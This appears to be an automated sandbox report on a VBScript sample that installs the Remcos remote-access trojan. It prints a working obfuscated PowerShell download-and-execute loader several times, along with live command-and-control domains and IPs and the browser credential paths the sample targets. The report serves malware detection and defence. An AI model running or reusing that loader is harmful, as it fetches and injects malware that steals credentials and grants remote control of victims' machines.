                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs" Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = new-object system.net.webclient;$marmalady = $fishers.downloaddata($noninterest);$ruddle = [system.text.encoding]::utf8.getstring($marmalady);$bleekbok = '<<base64_start>>';$rouse = '<<base64_end>>';$unloose = $ruddle.indexof($bleekbok);$benedict = $ruddle.indexof($rouse);$unloose -ge 0 -and $benedict -gt $unloose;$unloose += $bleekbok.length;$tumefied = $benedict - $unloose;$biographed = $ruddle.substring($unloose, $tumefied);$backing = -join ($biographed.tochararray() | foreach-object { $_ })[-1..-($biographed.length)];$nonflavored = [system.convert]::frombase64string($backing);$hemautogram = [system.reflection.assembly]::load($nonflavored);$subcarbureted = [dnlib.io.home].getmethod('vai');$subcarbureted.invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'msbuild', '$delie','$delie','$delie','talpe', 'c:\programdata\','talpe','vbs','1','1','taskname'));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = new-object system.net.webclient;$marmalady = $fishers.downloaddata($noninterest);$ruddle = [system.text.encoding]::utf8.getstring($marmalady);$bleekbok = '<<base64_start>>';$rouse = '<<base64_end>>';$unloose = $ruddle.indexof($bleekbok);$benedict = $ruddle.indexof($rouse);$unloose -ge 0 -and $benedict -gt $unloose;$unloose += $bleekbok.length;$tumefied = $benedict - $unloose;$biographed = $ruddle.substring($unloose, $tumefied);$backing = -join ($biographed.tochararray() | foreach-object { $_ })[-1..-($biographed.length)];$nonflavored = [system.convert]::frombase64string($backing);$hemautogram = [system.reflection.assembly]::load($nonflavored);$subcarbureted = [dnlib.io.home].getmethod('vai');$subcarbureted.invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'msbuild', '$delie','$delie','$delie','talpe', 'c:\programdata\','talpe','vbs','1','1','taskname'));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = new-object system.net.webclient;$marmalady = $fishers.downloaddata($noninterest);$ruddle = [system.text.encoding]::utf8.getstring($marmalady);$bleekbok = '<<base64_start>>';$rouse = '<<base64_end>>';$unloose = $ruddle.indexof($bleekbok);$benedict = $ruddle.indexof($rouse);$unloose -ge 0 -and $benedict -gt $unloose;$unloose += $bleekbok.length;$tumefied = $benedict - $unloose;$biographed = $ruddle.substring($unloose, $tumefied);$backing = -join ($biographed.tochararray() | foreach-object { $_ })[-1..-($biographed.length)];$nonflavored = [system.convert]::frombase64string($backing);$hemautogram = [system.reflection.assembly]::load($nonflavored);$subcarbureted = [dnlib.io.home].getmethod('vai');$subcarbureted.invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'msbuild', '$delie','$delie','$delie','talpe', 'c:\programdata\','talpe','vbs','1','1','taskname'));"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = new-object system.net.webclient;$marmalady = $fishers.downloaddata($noninterest);$ruddle = [system.text.encoding]::utf8.getstring($marmalady);$bleekbok = '<<base64_start>>';$rouse = '<<base64_end>>';$unloose = $ruddle.indexof($bleekbok);$benedict = $ruddle.indexof($rouse);$unloose -ge 0 -and $benedict -gt $unloose;$unloose += $bleekbok.length;$tumefied = $benedict - $unloose;$biographed = $ruddle.substring($unloose, $tumefied);$backing = -join ($biographed.tochararray() | foreach-object { $_ })[-1..-($biographed.length)];$nonflavored = [system.convert]::frombase64string($backing);$hemautogram = [system.reflection.assembly]::load($nonflavored);$subcarbureted = [dnlib.io.home].getmethod('vai');$subcarbureted.invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'msbuild', '$delie','$delie','$delie','talpe', 'c:\programdata\','talpe','vbs','1','1','taskname'));"Jump to behavior
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDQ+
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)Q<
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managers
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager Q
                        Source: MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1
                        Source: MSBuild.exe, 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3171710253.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.12.drBinary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00433E0A cpuid 12_2_00433E0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,12_2_0040E679
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,12_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,12_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,12_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,12_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00448057
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db12_2_0040B335

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe12_2_00405042
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information421
                        Scripting
                        Valid Accounts1
                        Native API
                        421
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        1
                        Bypass User Account Control
                        3
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol211
                        Input Capture
                        21
                        Encrypted Channel
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials In Files
                        1
                        System Service Discovery
                        SMB/Windows Admin Shares3
                        Clipboard Data
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution
                        Login Hook1
                        Windows Service
                        1
                        Bypass User Account Control
                        NTDS3
                        File and Directory Discovery
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        PowerShell
                        Network Logon Script222
                        Process Injection
                        1
                        Masquerading
                        LSA Secrets33
                        System Information Discovery
                        SSHKeylogging13
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials21
                        Security Software Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation
                        DCSync31
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                        Process Injection
                        Proc Filesystem3
                        Process Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578245 Sample: LbtytfWpvx.vbs Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 47 set.officialswrc.top 2->47 49 rem.pushswroller.eu 2->49 51 10 other IPs or domains 2->51 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 16 other signatures 2->65 9 wscript.exe 2 2->9         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 81 VBScript performs obfuscated calls to suspicious functions 9->81 83 Suspicious powershell command line found 9->83 85 Wscript starts Powershell (via cmd or directly) 9->85 87 2 other signatures 9->87 14 powershell.exe 14 17 9->14         started        18 powershell.exe 12->18         started        process6 dnsIp7 57 set.officialswrc.top 5.182.211.158, 443, 49737, 49755 SKB-ENTERPRISENL Netherlands 14->57 89 Writes to foreign memory regions 14->89 91 Injects a PE file into a foreign processes 14->91 20 MSBuild.exe 14->20         started        23 MSBuild.exe 6 17 14->23         started        27 cmd.exe 2 14->27         started        29 conhost.exe 14->29         started        31 MSBuild.exe 3 2 18->31         started        33 conhost.exe 18->33         started        35 MSBuild.exe 18->35         started        signatures8 process9 dnsIp10 67 Contains functionality to bypass UAC (CMSTPLUA) 20->67 69 Contains functionalty to change the wallpaper 20->69 71 Contains functionality to steal Chrome passwords or cookies 20->71 79 3 other signatures 20->79 53 dim.remofficialws.top 45.80.158.30, 23101, 49739, 49741 UK2NET-ASGB Netherlands 23->53 55 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 23->55 41 C:\Users\user\AppData\Local\Temp\ajul.vbs, data 23->41 dropped 43 C:\ProgramData\remcos\logs.dat, data 23->43 dropped 73 Installs a global keyboard hook 23->73 37 wscript.exe 23->37         started        45 C:\ProgramData\talpe.vbs, Unicode 27->45 dropped 75 Potential malicious VBS script found (suspicious strings) 27->75 77 Command shell drops VBS files 27->77 39 conhost.exe 27->39         started        file11 signatures12 process13

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        LbtytfWpvx.vbs5%ReversingLabsWin32.Trojan.Generic
                        LbtytfWpvx.vbs5%VirustotalBrowse
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://set.officialswrc.top/ink/gre.txt0%Avira URL Cloudsafe
                        http://set.officialswrc.top0%Avira URL Cloudsafe
                        dim.remofficialws.top0%Avira URL Cloudsafe
                        rem.officialswvrem.top0%Avira URL Cloudsafe
                        https://set.officialswrc.top0%Avira URL Cloudsafe
                        rem.pushswroller.eu100%Avira URL Cloudmalware
                        firewarzone.ydns.eu100%Avira URL Cloudmalware
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        199.232.210.172
                        truefalse
                          high
                          firewarzone.ydns.eu
                          45.80.158.30
                          truetrue
                            unknown
                            set.officialswrc.top
                            5.182.211.158
                            truetrue
                              unknown
                              rem.pushswroller.eu
                              45.80.158.30
                              truetrue
                                unknown
                                geoplugin.net
                                178.237.33.50
                                truefalse
                                  high
                                  s-part-0035.t-0009.t-msedge.net
                                  13.107.246.63
                                  truefalse
                                    high
                                    rem.officialswvrem.top
                                    45.80.158.30
                                    truetrue
                                      unknown
                                      fp2e7a.wpc.phicdn.net
                                      192.229.221.95
                                      truefalse
                                        high
                                        dim.remofficialws.top
                                        45.80.158.30
                                        truetrue
                                          unknown
                                          res.cloudinary.com
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://set.officialswrc.top/ink/gre.txttrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://geoplugin.net/json.gpfalse
                                              high
                                              firewarzone.ydns.eutrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              rem.pushswroller.eutrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              rem.officialswvrem.toptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              dim.remofficialws.toptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtewscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc//wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsbitCwscript.exe, 00000000.00000003.1699236695.0000022E127B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://res.cloudinary.com/dzvai8wscript.exe, wscript.exe, 00000008.00000002.1978037118.00000266E0885000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975830431.00000266E0884000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977981910.00000266E0880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975290595.00000266E0882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmeCwscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpgpowershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://set.officialswrc.toppowershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2002003466.000001CB00EF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://set.officialswrc.toppowershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://github.com/koswald/VBScript/blob/master/SetupPerUser.mdwscript.exe, 00000000.00000003.1702805355.0000022E128B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702649965.0000022E10936000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703228032.0000022E129B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698585874.0000022E127D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.1959638902.00000176D8A20000.00000004.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974006639.00000266E0981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.drfalse
                                                                  high
                                                                  https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocv4wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmehwscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://res.cloudinary.compowershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
